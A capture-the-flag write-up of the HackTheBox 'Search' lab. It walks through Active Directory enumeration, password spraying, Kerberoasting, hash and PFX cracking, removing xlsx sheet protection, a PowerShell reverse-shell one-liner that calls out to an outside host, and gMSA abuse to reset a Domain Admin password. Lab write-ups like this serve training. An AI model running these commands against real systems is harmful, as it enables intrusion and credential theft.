title: HackTheBox-Search author: Mosaic Theory layout: true categories: Vulnerability Labs tags:
• Box-pwning diary
Recon:
Nmap scan report for 10.10.11.129
Host is up (0.17s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
8172/tcp open unknown
9389/tcp open adws
49667/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49702/tcp open unknown
49716/tcp open unknown
sudo nmap -sC -sV -Pn -T4 -oA nmap.txt -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,8172,9389 10.10.11.129
Nmap scan report for 10.10.11.129
Host is up (0.35s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Search — Just Testing IIS
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-22 09:32:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-05-22T09:34:11+00:00; 0s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2022-05-22T09:34:11+00:00; 0s from scanner time.
|_http-title: Search — Just Testing IIS
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-05-22T09:34:10+00:00; -1s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-05-22T09:34:10+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-05-22T09:34:10+00:00; 0s from scanner time.
8172/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: 2022-05-22T09:34:10+00:00; 0s from scanner time.
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after: 2030-04-05T09:05:25
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-IIS/10.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-05-22T09:33:32
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.65 seconds
>> whatweb http://10.10.11.129
http://10.10.11.129 [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[youremail@search.htb], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.10.11.129], JQuery[3.3.1], Microsoft-IIS[10.0], Script, Title[Search — Just Testing IIS], X-Powered-By[ASP.NET]
Port 80:
The site has plenty of buttons, but they are all anchors. The page does list some staff names, though:
>> cat username.txt
Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart
>> ./namemash.py username.txt > newname.txt
>> cat newname.txt
keelylyons
lyonskeely
keely.lyons
lyons.keely
lyonsk
..........................
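The permutation step above, as an added example that is not the page's namemash.py: a reimplementation of the same idea in Python. The pattern list and its order are my assumption, chosen so the first five candidates match the head of newname.txt shown above; reading the name list from a file argument or stdin is also an assumption.

```python
import re
import sys

# Candidate formats, in the order they are emitted. {f} is the first initial.
# These are assumed patterns, not copied from namemash.py.
PATTERNS = (
    "{first}{last}",     # keelylyons
    "{last}{first}",     # lyonskeely
    "{first}.{last}",    # keely.lyons
    "{last}.{first}",    # lyons.keely
    "{last}{f}",         # lyonsk
    "{f}{last}",         # klyons
    "{f}.{last}",        # k.lyons
    "{last}.{f}",        # lyons.k
    "{first}",           # keely
    "{last}",            # lyons
)


def permutations(full_name: str) -> list:
    """Return de-duplicated account-name candidates for one 'First Last' string."""
    parts = re.split(r"\s+", full_name.strip().lower())
    if len(parts) < 2:
        return parts                      # single token: nothing to permute
    first, last = parts[0], parts[-1]     # middle names are ignored
    seen, out = set(), []
    for pattern in PATTERNS:
        cand = pattern.format(first=first, last=last, f=first[0])
        if cand not in seen:
            seen.add(cand)
            out.append(cand)
    return out


def namemash(lines) -> list:
    """Apply permutations() to every non-empty line of a name list."""
    out = []
    for line in lines:
        if line.strip():
            out.extend(permutations(line))
    return out


if __name__ == "__main__":
    # usage: python namemash_example.py username.txt > newname.txt
    src = open(sys.argv[1]) if len(sys.argv) > 1 else sys.stdin
    print("\n".join(namemash(src)))
```

The output feeds kerbrute userenum exactly as above; the pre-authentication error codes tell the KDC-facing tool which candidates exist without ever locking an account out.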
The page also carries an image that reads "Send password to Hope Sharp" / "IsolationIsKey?"; it is not clear yet whether that relates to the target. Directory brute-forcing turned up nothing, and port 443 serves the same site as port 80.
Kerberos:
>> kerbrute userenum -d search.htb ./newname.txt --dc 10.10.11.129
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/22/22 - Ronnie Flathers @ropnop
2022/05/22 18:24:58 > Using KDC(s):
2022/05/22 18:24:58 > 10.10.11.129:88
2022/05/22 18:24:58 > [+] VALID USERNAME: keely.lyons@search.htb
2022/05/22 18:24:58 > [+] VALID USERNAME: dax.santiago@search.htb
2022/05/22 18:24:58 > [+] VALID USERNAME: sierra.frye@search.htb
2022/05/22 18:25:01 > [+] VALID USERNAME: hope.sharp@search.htb
2022/05/22 18:25:01 > Done! Tested 90 usernames (4 valid) in 3.259 seconds
The naming convention appears to be firstname.lastname@search.htb. With the four valid usernames in username.txt, I sprayed the password string from the image across them:
>> crackmapexec smb 10.10.11.129 -u username.txt -p IsolationIsKey? --continue-on-success
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [-] search.htb\keely.lyons:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\dax.santiago:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\sierra.frye:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [+] search.htb\hope.sharp:IsolationIsKey?
One account authenticates. WinRM (5985) is not exposed, but the account has write access to one share:
>> smbmap -u hope.sharp -p IsolationIsKey? -H 10.10.11.129
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share
It contains one directory per user:
>> smbclient //10.10.11.129/RedirectedFolders$ -U hope.sharp
Password for [WORKGROUP\hope.sharp]:
Try "help" to get a list of possible commands.
smb: \> ls
. Dc 0 Sun May 22 18:38:33 2022
.. Dc 0 Sun May 22 18:38:33 2022
abril.suarez Dc 0 Wed Apr 8 02:12:58 2020
Angie.Duffy Dc 0 Fri Jul 31 21:11:32 2020
Antony.Russo Dc 0 Fri Jul 31 20:35:32 2020
belen.compton Dc 0 Wed Apr 8 02:32:31 2020
Cameron.Melendez Dc 0 Fri Jul 31 20:37:36 2020
chanel.bell Dc 0 Wed Apr 8 02:15:09 2020
Claudia.Pugh Dc 0 Fri Jul 31 21:09:08 2020
Cortez.Hickman Dc 0 Fri Jul 31 20:02:04 2020
dax.santiago Dc 0 Wed Apr 8 02:20:08 2020
Eddie.Stevens Dc 0 Fri Jul 31 19:55:34 2020
edgar.jacobs Dc 0 Fri Apr 10 04:04:11 2020
Edith.Walls Dc 0 Fri Jul 31 20:39:50 2020
eve.galvan Dc 0 Wed Apr 8 02:23:13 2020
frederick.cuevas Dc 0 Wed Apr 8 02:29:22 2020
hope.sharp Dc 0 Thu Apr 9 22:34:41 2020
jayla.roberts Dc 0 Wed Apr 8 02:07:00 2020
Jordan.Gregory Dc 0 Fri Jul 31 21:01:06 2020
payton.harmon Dc 0 Fri Apr 10 04:11:39 2020
Reginald.Morton Dc 0 Fri Jul 31 19:44:32 2020
santino.benjamin Dc 0 Wed Apr 8 02:10:25 2020
Savanah.Velazquez Dc 0 Fri Jul 31 20:21:42 2020
sierra.frye Dc 0 Thu Nov 18 09:01:46 2021
trace.ryan Dc 0 Fri Apr 10 04:14:26 2020
3246079 blocks of size 4096. 579883 blocks available
smb: \> cd chanel.bell\
smb: \chanel.bell\> ls
. Dc 0 Wed Apr 8 02:15:09 2020
.. Dc 0 Wed Apr 8 02:15:09 2020
Desktop DRc 0 Wed Apr 8 02:17:23 2020
Documents DRc 0 Wed Apr 8 02:17:25 2020
Downloads DRc 0 Wed Apr 8 02:17:24 2020
3246079 blocks of size 4096. 579883 blocks available
I have no access inside their folders, but I still dropped an SCF file (its IconFile points at an attacker UNC path, so Explorer authenticates to it when a user browses the folder, which can leak a Net-NTLM hash). It can only be written to the share root:
smb: \Angie.Duffy\Desktop\> put user.scf
NT_STATUS_ACCESS_DENIED opening remote file \Angie.Duffy\Desktop\user.scf
smb: \Angie.Duffy\Desktop\> cd ..
smb: \Angie.Duffy\> cd ..
smb: \> put user.scf
putting file user.scf as \user.scf (0.0 kb/s) (average 0.0 kb/s)
smb: \> ls
. Dc 0 Sun May 22 18:45:17 2022
.. Dc 0 Sun May 22 18:45:17 2022
abril.suarez Dc 0 Wed Apr 8 02:12:58 2020
Angie.Duffy Dc 0 Fri Jul 31 21:11:32 2020
Antony.Russo Dc 0 Fri Jul 31 20:35:32 2020
trace.ryan Dc 0 Fri Apr 10 04:14:26 2020
user.scf Ac 88 Sun May 22 18:45:17 2022
Since I now hold valid credentials, I can at least collect domain information:
>> bloodhound-python --zip -c All -d SEARCH.htb -u hope.sharp -p IsolationIsKey? -ns 10.10.11.129
INFO: Found AD domain: search.htb
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 113 computers
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 107 users
INFO: Found 64 groups
INFO: Found 0 trusts
INFO: Done in 00M 57S
INFO: Compressing output into 20220522194601_bloodhound.zip
Unfortunately there is little of interest in it. Running the BloodHound pre-built query "List all Kerberoastable Accounts" does show two service accounts, though, one of them WEB_SVC:
Kerberoasting:
As hope.sharp I can request a TGS for WEB_SVC's SPN:
>> GetUserSPNs.py -request -dc-ip 10.10.11.129 search.htb/hope.sharp -outputfile web_svc.hash
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- ------- -------- -------------------------- --------- ----------
RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 20:59:11.329031
[-] CCache file is not found. Skipping...
The $krb5tgs$23$ prefix marks an RC4 (etype 23) TGS-REP hash, which is hashcat mode 13100:
>> hashcat -h | grep "TGS-REP"
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
>> hashcat -m 13100 web_svc.hash /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$337dfb5b4eeb1c54fdc0998e728b5fd3$062ec46e51aa41977e549c3e4f209f74dc80c8c3f43d5aa962d6176b406b8708aa4f77c823069aa7484e1fea8c40ce2a02bf5d7368f072850379a38f2e0863e65d724ba....................
6356457366e1a78a54d6ed65ac38c9d091d8b67d607286a02eb4ff72bffff6f4c586976ec66d581d5273c0e03de726ab2aa0afb9b70a3126a440926f44ade3fbc7f5cccac8afddf0ee6001e1f532005954201fb591a5ff422f326b9a025579996a5:@3ONEmillionbaby
The password is valid:
>> crackmapexec smb 10.10.11.129 -u web_svc -p @3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\web_svc:@3ONEmillionbaby
But it gives nothing new:
>> smbmap -H 10.10.11.129 -u web_svc -p @3ONEmillionbaby
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share
Password spraying:
The share listing gave me more usernames; first confirm they exist:
>> kerbrute userenum -d search.htb ./username.txt --dc 10.10.11.129
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/22/22 - Ronnie Flathers @ropnop
2022/05/22 20:13:03 > Using KDC(s):
2022/05/22 20:13:03 > 10.10.11.129:88
2022/05/22 20:13:03 > [+] VALID USERNAME: abril.suarez@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: chanel.bell@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: cameron.melendez@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: belen.compton@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: angie.duffy@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: antony.russo@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: claudia.pugh@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: cortez.hickman@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: eddie.stevens@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: dax.santiago@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: edith.walls@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: frederick.cuevas@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: hope.sharp@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: edgar.jacobs@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: eve.galvan@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: jayla.roberts@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: jordan.gregory@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: sierra.frye@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: savanah.velazquez@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: reginald.morton@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: santino.benjamin@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: payton.harmon@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: trace.ryan@search.htb
2022/05/22 20:13:04 > Done! Tested 23 usernames (23 valid) in 0.918 seconds
Then spray the two passwords known so far (hope.sharp's and web_svc's, in passwd.txt) across all of them:
>> crackmapexec smb 10.10.11.129 -u username.txt -p passwd.txt --continue-on-success | grep "[+]"
SMB 10.10.11.129 445 RESEARCH [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [+] search.htb\hope.sharp:IsolationIsKey?
edgar.jacobs sees one more share, helpdesk, but it is empty:
>> smbmap -H 10.10.11.129 -u edgar.jacobs -p @3ONEmillionbaby
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share
>> smbclient //10.10.11.129/helpdesk -U edgar.jacobs
Password for [WORKGROUP\edgar.jacobs]:
Try "help" to get a list of possible commands.
smb: \> ls
. Dc 0 Tue Apr 14 18:24:23 2020
.. Dc 0 Tue Apr 14 18:24:23 2020
3246079 blocks of size 4096. 581884 blocks available
Nor does it give a foothold on the host: psexec with the NT hash can upload to RedirectedFolders$ but cannot open the service manager:
>> psexec.py -hashes '92b9467a379658c07e2341b45a090a3c:92b9467a379658c07e2341b45a090a3c' 'search/edgar.jacobs@10.10.11.129'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.11.129.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'CertEnroll' is not writable.
[-] share 'helpdesk' is not writable.
[-] share 'NETLOGON' is not writable.
[*] Found writable share RedirectedFolders$
[*] Uploading file cQzBhSYX.exe
[*] Opening SVCManager on 10.10.11.129.....
[-] Error opening SVCManager on 10.10.11.129.....
[-] Error performing the installation, cleaning up: Unable to open SVCManager
Finally, edgar.jacobs's desktop holds something interesting:
smb: \edgar.jacobs\Desktop\> ls
. DRc 0 Mon Aug 10 18:02:16 2020
.. DRc 0 Mon Aug 10 18:02:16 2020
$RECYCLE.BIN DHSc 0 Fri Apr 10 04:05:29 2020
desktop.ini AHSc 282 Mon Aug 10 18:02:16 2020
Microsoft Edge.lnk Ac 1450 Fri Apr 10 04:05:03 2020
Phishing_Attempt.xlsx Ac 23130 Mon Aug 10 18:35:44 2020
3246079 blocks of size 4096. 581611 blocks available
smb: \edgar.jacobs\Desktop\> get Phishing_Attempt.xlsx
The sheet appears to have a hidden column C, but I cannot unhide it; trying to do so prompts for a worksheet-protection password:
Two guessed passwords failed:
A quick search shows that this protection does not protect the data: nothing is encrypted, the sheet is merely locked against edits. Since an xlsx is a zip archive, I can rename it to .zip and extract the XML inside:
Under xl\worksheets, the worksheet XML (sheet.xml) holds the protection settings (a sheetProtection element):
Delete that element, zip the tree back up, rename it to .xlsx, and the column can be unhidden. It held usernames and passwords, which I paired one-to-one with --no-bruteforce:
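The unprotect procedure above, scripted in Python as an added example (not the post's own steps). It walks the xlsx zip, removes every sheetProtection element and the hidden attribute on column definitions, and writes a new archive. The minimal workbook it builds for itself is constructed for offline testing, not a real Excel file; the output file name is an assumption.

```python
import io
import re
import sys
import zipfile

# A self-closing <sheetProtection .../> element, whatever its attributes
# (legacy password="...", or algorithmName/hashValue/saltValue on newer files).
PROTECTION_RE = re.compile(r"<sheetProtection\b[^>]*/>")
# hidden="1" (or "true") on a <col .../> column definition
HIDDEN_COL_RE = re.compile(r'(<col\b[^>]*?)\s+hidden="(?:1|true)"')


def unprotect_sheet_xml(xml: str) -> str:
    """Drop worksheet protection and unhide columns; cell data is untouched."""
    xml = PROTECTION_RE.sub("", xml)
    return HIDDEN_COL_RE.sub(r"\1", xml)


def unprotect_xlsx(data: bytes) -> bytes:
    """Return a copy of the xlsx zip with every worksheet XML rewritten."""
    src = zipfile.ZipFile(io.BytesIO(data))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            payload = src.read(info.filename)
            if info.filename.startswith("xl/worksheets/") and info.filename.endswith(".xml"):
                payload = unprotect_sheet_xml(payload.decode("utf-8")).encode("utf-8")
            dst.writestr(info, payload)   # keeps the original entry name and metadata
    return out.getvalue()


def sheet_xml(data: bytes, name: str = "xl/worksheets/sheet1.xml") -> str:
    """Read one worksheet's XML out of an xlsx."""
    return zipfile.ZipFile(io.BytesIO(data)).read(name).decode("utf-8")


# Constructed minimal workbook (not a real Excel file): one protected sheet with
# column C (min=max=3) hidden, the situation described above.
SAMPLE_SHEET = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
    '<sheetProtection algorithmName="SHA-512" hashValue="AAAA" saltValue="BBBB"'
    ' spinCount="100000" sheet="1" objects="1" scenarios="1"/>'
    '<cols><col min="3" max="3" width="30" hidden="1" customWidth="1"/></cols>'
    '<sheetData/></worksheet>'
)


def build_sample_xlsx() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/worksheets/sheet1.xml", SAMPLE_SHEET)
    return buf.getvalue()


if __name__ == "__main__":
    # usage: python unprotect_xlsx.py Phishing_Attempt.xlsx
    path = sys.argv[1]
    with open(path, "rb") as f:
        fixed = unprotect_xlsx(f.read())
    out_path = path.rsplit(".", 1)[0] + ".unprotected.xlsx"
    with open(out_path, "wb") as f:
        f.write(fixed)
    print("wrote", out_path)
```

Excel only consults the hashValue when a user asks to unprotect the sheet, so once the element is gone there is nothing left to check; the cell values were readable in the raw XML all along, which is the point about this being a UI lock rather than encryption.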
>> crackmapexec smb 10.10.11.129 -u username.txt -p passwd.txt --no-bruteforce --continue-on-success | grep "[+]"
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Margaret.Robinson://51+mountain+DEAR+noise+83// STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Scarlett.Parks:++47|building|WARSAW|gave|60++ STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [+] search.htb\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
One of them works:
>> smbmap -H 10.10.11.129 -u Sierra.Frye -p '$$49=wide=STRAIGHT=jordan=28$$18'
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share
Still nothing new in the shares, but user.txt sits on this user's desktop:
smb: \sierra.frye\Desktop\> ls
. DRc 0 Thu Nov 18 09:08:00 2021
.. DRc 0 Thu Nov 18 09:08:00 2021
$RECYCLE.BIN DHSc 0 Wed Apr 8 02:03:59 2020
desktop.ini AHSc 282 Fri Jul 31 22:42:15 2020
Microsoft Edge.lnk Ac 1450 Tue Apr 7 20:28:05 2020
user.txt Ac 33 Thu Nov 18 08:55:27 2021
3246079 blocks of size 4096. 581346 blocks available
smb: \sierra.frye\Desktop\>
A Backups folder under Downloads holds a CA certificate and a PFX:
smb: \sierra.frye\Downloads\Backups\> ls
. DHc 0 Tue Aug 11 04:39:17 2020
.. DHc 0 Tue Aug 11 04:39:17 2020
search-RESEARCH-CA.p12 Ac 2643 Fri Jul 31 23:04:11 2020
staff.pfx Ac 4326 Tue Aug 11 04:39:17 2020
3246079 blocks of size 4096. 581342 blocks available
smb: \sierra.frye\Downloads\Backups\> get staff.pfx
I recalled that one HTTPS endpoint answered 403; perhaps it wants a client certificate. The PFX is password-protected, so crack that first:
>> pfx2john staff.pfx > staff.pfx.hash
>> john staff.pfx.hash -w=/usr/share/wordlists/rockyou.txt
Created directory: /home/mosaic/.john
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy (staff.pfx)
1g 0:00:01:46 DONE (2022-05-22 21:48) 0.009372g/s 51401p/s 51401c/s 51401C/s misssnamy..missnono
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Importing staff.pfx (password misspissy) into the browser gets past the 403, and a login form appears; sierra.frye's domain password opens a web-based PowerShell console (not a real shell):
PS C:\Users\Sierra.Frye\Documents>
$client = New-Object System.Net.Sockets.TCPClient("10.10.16.4",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..
65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIE
ncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path
+ "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.F
lush()};$client.Close()
At line:1 char:1
+ $client = New-Object System.Net.Sockets.TCPClient("10.10.16.4",1337); ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
PS C:\Users\Sierra.Frye\Documents>
There is antivirus on the box: AMSI blocked the reverse-shell one-liner (ScriptContainedMaliciousContent).
ReadGMSAPassword rights:
Collecting BloodHound data again with sierra.frye's credentials reveals more edges:
I can first read the managed password of the gMSA account BIR-ADFS-GMSA, then use that account to reset the password of Tristan.Davies, a member of the Domain Admins group. ConvertFrom-ADManagedPasswordBlob comes from the DSInternals module, so that module has to be available on the host:
PS C:\Users\Sierra.Frye\Documents> $gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> $mp = $gmsa.'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> ConvertFrom-ADManagedPasswordBlob $mp
Version : 1
CurrentPassword : ꪌ絸禔හॐ뒟娯㔃ᴨ蝓㣹瑹䢓疒웠ᇷꀠ믱츎孻勒壉馮ၸ뛋귊餮꤯ꏗ춰䃳ꘑ畓릝樗껇쁵藫䲈酜⏬궩Œ痧蘸朘嶑侪糼亵韬⓼ↂᡳ춲⼦싸ᖥ裹沑᳡扚羺歖㗻෪ꂓ㚬⮗㞗ꆱ긿쾏㢿쭗캵십ㇾେ͍롤
ᒛ�䬁ማ譿녓鏶᪺骲雰騆惿閴滭䶙竜迉竾ﵸ䲗蔍瞬䦕垞뉧⩱茾蒚⟒澽座걍盡篇
SecureCurrentPassword : System.Security.SecureString
PreviousPassword :
SecurePreviousPassword :
QueryPasswordInterval : 2876.09:21:31.4918812
UnchangedPasswordInterval : 2876.09:16:31.4918812
PS C:\Users\Sierra.Frye\Documents>
The plaintext is random binary rendered as UTF-16 text, which is why it looks like garbage. Rather than copying the string, keep the SecureString form and build a credential from it:
PS C:\Users\Sierra.Frye\Documents> (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
ꪌ絸禔හॐ뒟娯㔃ᴨ蝓㣹瑹䢓疒웠ᇷꀠ믱츎孻勒壉馮ၸ뛋귊餮꤯ꏗ춰䃳ꘑ畓릝樗껇쁵藫䲈酜⏬궩Œ痧蘸朘嶑侪糼亵韬⓼ↂᡳ춲⼦싸ᖥ裹沑᳡扚羺歖㗻෪ꂓ㚬⮗㞗ꆱ긿쾏㢿쭗캵십ㇾେ͍롤ᒛ�䬁ማ譿녓鏶᪺骲雰騆惿閴滭䶙竜迉竾ﵸ䲗蔍瞬䦕垞뉧⩱
茾蒚⟒澽座걍盡篇
PS C:\Users\Sierra.Frye\Documents> $password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
PS C:\Users\Sierra.Frye\Documents> $SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
PS C:\Users\Sierra.Frye\Documents>
Now reset tristan.davies's password with the gMSA credential:
PS C:\Users\Sierra.Frye\Documents> $cred = New-Object System.Management.Automation.PSCredential BIR-ADFS-GMSA, $SecPass
PS C:\Users\Sierra.Frye\Documents> Invoke-Command -ComputerName 127.0.0.1 -ScriptBlock {Set-ADAccountPassword -Identity tristan.davies -reset -NewPassword (ConvertTo-SecureString -AsPlainText 'whoamiWHOAMI!' -force)} -Credential $cred
PS C:\Users\Sierra.Frye\Documents>
